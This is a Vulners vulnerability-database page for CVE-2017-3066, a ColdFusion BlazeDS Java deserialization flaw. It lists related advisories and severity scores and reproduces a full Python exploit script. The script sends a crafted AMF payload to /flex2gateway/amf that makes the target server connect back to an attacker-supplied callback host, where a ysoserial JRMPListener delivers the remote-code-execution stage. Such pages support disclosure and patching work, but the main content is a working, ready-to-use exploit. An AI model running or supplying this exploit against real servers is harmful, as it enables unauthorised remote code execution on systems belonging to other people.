Vulners
Lucene search
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution
| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
 | Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution Exploit | 7 Feb 201800:00 | – | zdt |
 | Publicly Available Tools Seen in Cyber Incidents Worldwide | 30 Jun 202012:00 | – | ics |
 | CVE-2017-3066 | 27 Apr 201700:00 | – | attackerkb |
 | APSB17-14 Security update available for ColdFusion | 25 Apr 201700:00 | – | adobe |
 | CVE-2017-3066 | 9 Oct 202016:13 | – | circl |
 | Adobe ColdFusion Deserialization Vulnerability | 24 Feb 202500:00 | – | cisa_kev |
 | CISA Adds Two Known Exploited Vulnerabilities to Catalog | 24 Feb 202512:00 | – | cisa |
 | Adobe ColdFusion java deserialization vulnerability | 27 Apr 201700:00 | – | cnvd |
 | Adobe ColdFusion BlazeDS Java Object Deserialization RCE | 28 Apr 201700:00 | – | nessus |
| Adobe ColdFusion 10.x < 10u23 / 11.x < 11u12 / 2016.x < 2016u4 Multiple Vulnerabilities (APSB17-14) | 25 Apr 201700:00 | – | nessus |
10
# Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
# Date: February 6, 2018
# Exploit Author: Faisal Tameesh (@DreadSystems)
# Company: Depth Security (https://depthsecurity.com)
# Version: Adobe Coldfusion (11.0.03.292866)
# Tested On: Windows 10 Enterprise (10.0.15063)
# CVE: CVE-2017-3066
# Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
# Category: remote
# Notes:
# This is a two-stage deserialization exploit. The code below is the first stage.
# You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
# After firing this exploit, and once the target server connects back,
# JRMPListener will deliver the secondary payload for RCE.
import struct
import sys
import requests
if len(sys.argv) != 5:
print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"
quit()
target_IP = sys.argv[1]
target_port = sys.argv[2]
callback_IP = sys.argv[3]
callback_port = sys.argv[4]
amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
'\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
struct.pack('>I', int(callback_port)) + \
'\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';
url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Feb 2018 00:00Current
9.5High risk
Vulners AI Score9.5
CVSS 3.19.8
CVSS 210
EPSS0.93684
SSVC